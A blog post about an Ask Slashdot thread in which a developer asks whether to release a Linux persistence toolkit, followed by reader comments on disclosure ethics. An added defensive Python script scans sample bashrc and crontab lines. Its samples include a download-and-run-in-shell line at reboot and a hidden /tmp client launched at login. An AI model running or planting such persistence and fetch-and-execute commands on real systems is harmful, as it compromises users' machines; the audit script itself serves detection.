Linux Malware – Proof that Linux is not as secure as we all think

There was an interesting post on Ask Slashdot discussing the ethics of releasing non-malicious Linux malware to simply prove a point to all of the people who rant and rave about Linux being so secure.  A developer by the name of buchner.johannes

buchner.johannes writes:

“I was fed up with the general consensus that Linux is oh-so-secure and has no malware. After a week of work, I finished a package of malware for Unix/Linux. Its whole purpose is to help white-hat hackers point out that a Linux system can be turned into a botnet client by simply downloading BOINC and attaching it to a user account to help scientific projects. The malware does not exploit any security holes, only loose security configurations and mindless execution of unverified downloads. I tested it to be injected by a PHP script (even circumventing safe mode), so that the Web server runs it; I even got a proxy server that injects it into shell scripts and makefiles in tarballs on the fly, and adds onto Windows executables for execution in Wine. If executed by the user, the malware can persist itself in cron, bashrc and other files. The aim of the exercise was to provide a payload so security people can ‘pwn’ systems to show security holes, without doing harm (such as deleting files or disrupting normal operation). But now I am unsure of whether it is ethically OK to release this toolkit, which, by ripping out the BOINC payload and putting in something really evil, could be turned into proper Linux malware. On the one hand, the way it persists itself in autostart is really nasty, and that is not really a security hole that can be fixed. On the other hand, such a script can be written by anyone else too, and it would be useful to show people why you need SELinux on a server, and why verifying the source of downloads (checksums through trusted channels) is necessary. Technically, it is a nice piece, but should I release it? I don’t want to turn the Linux desktop into Windows, hence I’m slightly leaning towards not releasing it. What does your ethics say about releasing such grayware?”
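
The post names the two places this kind of payload hides, cron and the shell start-up files. As an added example, not part of the post or of the developer's toolkit, here is a small defender-side audit that scans constructed samples of a user's `.bashrc` and crontab for auto-start entries worth a second look; the rule set, file names and sample lines are all assumptions made for the illustration.

```python
import re

# Heuristics for auto-start entries a defender would want to review (assumed, not from the post).
RULES = [
    (re.compile(r"(^|[\s=:])(/tmp|/var/tmp|/dev/shm)/"), "command lives in a world-writable directory"),
    (re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z|da)?sh\b"), "pipes a download straight into a shell"),
    (re.compile(r"\bnohup\b.*&\s*$"), "detaches a background process at login"),
]

CRON_FIELDS = 5  # minute hour day month weekday, then the command

def cron_command(line):
    """Return the command part of a crontab line, or None for blank, comment and VAR= lines."""
    s = line.strip()
    if not s or s.startswith("#") or re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", s):
        return None
    if s.startswith("@"):              # @reboot, @hourly, ... carry no time fields
        parts = s.split(None, 1)
        return parts[1] if len(parts) > 1 else None
    parts = s.split(None, CRON_FIELDS)
    return parts[CRON_FIELDS] if len(parts) > CRON_FIELDS else None

def audit(lines, source, is_cron=False):
    """Return (source, line_no, reason, command) for every line that matches a rule."""
    findings = []
    for n, raw in enumerate(lines, 1):
        cmd = cron_command(raw) if is_cron else raw.strip()
        if not cmd or cmd.startswith("#"):
            continue
        for pat, why in RULES:
            if pat.search(cmd):
                findings.append((source, n, why, cmd))
                break                   # one reason per line is enough for triage
    return findings

# Constructed sample input (not real files): ordinary lines first, then a persistence entry.
SAMPLE_BASHRC = [
    "export PATH=$HOME/bin:$PATH",
    "alias ll='ls -la'",
    "nohup /tmp/.x/client --attach-project http://example.invalid/ >/dev/null 2>&1 &",
]
SAMPLE_CRONTAB = [
    "MAILTO=''",
    "0 3 * * * /usr/bin/updatedb",
    "@reboot curl -s http://example.invalid/client.sh | sh",
]

if __name__ == "__main__":
    for f in audit(SAMPLE_BASHRC, "~/.bashrc") + audit(SAMPLE_CRONTAB, "crontab -l", is_cron=True):
        print("%s:%d: %s: %s" % f)
```

On a live box the same `audit()` can be fed the output of `crontab -l` and the contents of `~/.bashrc`, `~/.profile` and the files under `/etc/cron.d`.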

This is a great thing for the community at large to see: Linux can be exploited with malware just like its rival operating systems. However, I share the same concerns the developer does. This could indeed result in a black-hat user injecting something malicious into the code and turning the example into real, evil malware. I’m on the fence, though; maybe this is what Linux users need to prove that we aren’t like typical Windows users who click any random link and download any random software from any random untrusted third-party site. A user who goes by the name of silentcoder wrote: “Linux users (hardly ever) download and install software from the internet. We download and install packages from repositories. The average user simply cannot tell the difference between a useful piece of freeware and a bug-ridden, malware-spreading piece of adware.”

Paranoia aside, this definitely proves that Linux is just as susceptible to malware and viruses as any other operating system.  But, as I’ve always said, viruses and malware are usually a result of user error, no matter the operating system.

What do you all think, should this type of code be released as proof of concept even if it’s risking malicious manipulation?  Should we all just start using SELinux and be done with it?

5 thoughts on “Linux Malware – Proof that Linux is not as secure as we all think”

  1. There can be no OS which is completely secure, but the question to look at should be how much intervention or foolishness is required from the user to make the system/OS available for others to exploit. I was using a Windows system for 3 yrs and did not have an antivirus or firewall, and still, when tested with antivirus and anti-malware tools, did not find anything suspicious.

  2. Release it to the kernel coders for all the big distros first.

    Give them 2 months to look at it.

    Tell them that.

    After the 2 months, release it on public channels and forums.

    That’s the responsible way to do things.

    First you’re giving them first chances to harden the system.

    Second, you’re putting them under a deadline. Which means they better look at it NOW.

    Third, if that still doesn’t work, now it’s public and let the chips fall where they may.

    Free source. Free information. That’s the way I see it.

  3. Maybe I have just spoken to reasonable users, but so far, every Linux user I have asked has told me that Linux is vulnerable just like Windows; the only difference is that viruses are not targeted at Linux since it has a relatively small market share…

  4. So, the mad bomber attaches explosives to the pillar of the World Trade Center and detonates it. After the dust settles, they investigate, and one of the people in the know says: “The World Trade Center is very well built, and it’s not possible to make it collapse by destroying a pillar. If they want it to come down, they would have to attack the frame of the building, which is on the outside of the building.”

    Do you really want to give the black hats all the tools they need to turn Linux security into Windows “security”?
